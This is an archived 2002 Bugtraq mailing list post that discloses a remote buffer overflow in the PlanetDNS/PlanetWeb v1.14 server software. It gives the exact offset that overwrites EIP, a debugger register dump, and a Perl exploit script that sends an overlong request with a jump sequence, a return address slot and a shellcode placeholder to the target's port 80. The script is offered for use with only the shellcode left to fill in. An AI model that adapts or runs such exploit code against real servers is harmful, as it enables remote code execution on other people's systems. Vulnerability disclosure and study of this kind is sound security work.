Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

New buffer overflow in plaetDNS

From: securma massine <securma () caramail com>
Date: Thu, 17 Oct 2002 12:24:54 GMT+1
hi
planetdns ( http://www.planetdns.net)is
commercial software package that allows you to
turn computer into an Internet server.
and be able to create an Internet Name, connect to
a web server, FTP, mail server, etc. running
on your computer.
planetdns is vulnerable has a buffer overflow with a
overwrite of eip (never posted before )... one already
notified that a number of 1024 byte could crasher the
server, and I found that while sending (without GET/)un of
6500 byte could thus make a overwrite eip of execution of a
shellcode, the overwrite is done with byte 6449, 50, 51,
52.
one notices of aillor that ebx and always 4byte before the
eip the ret address will be thus a jmp ebx or call ebx that
one finds in many modules charged .
I realised an exploit tested on plaetweb v1.14 and who
gives L state of the following registers:
Access violation - code c0000005 (first chance)
eax=0217dfb0 ebx=0217ffdc ecx=41414141 edx=7846f5b5
esi=0217dfd8 edi=00000000
eip=41414141 esp=0217df18 ebp=0217df38 iopl=0 nv up
ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b
gs=0000 efl=00000246
43434343 ?? ???
exploit code:
#!/usr/bin/perl -w
#tool bop.pl
# buffer overflow tested against plaetweb v1.14
# humm..this exploit is not for lamers...
# Greetz: marocit and #crack.fr (specialemet
christal...plus tu pédales moins fort, moins tu #avances
plus vite..)
#

use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!! \n\n";
 exit;
}

$shellcode =
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#ad
d your favorit shellcode
$buffer = "A"x6444;
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx
= eip - 4 bytes jmp short 0xff x0d3
$ret = "\x43\x43\x43\x43";# insert your ret address with
(jmp ebx or call ebx)
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer$ebx$ret$minibuf$shellcode";
print "\nsending exploit......\n\n";

_________________________________________________________
Gagnes une PS2 ! Envoies un SMS avec le code PS au 61166
(0,34€ Hors coût du SMS)
Previous By Date Next
Previous By Thread Next

Current thread: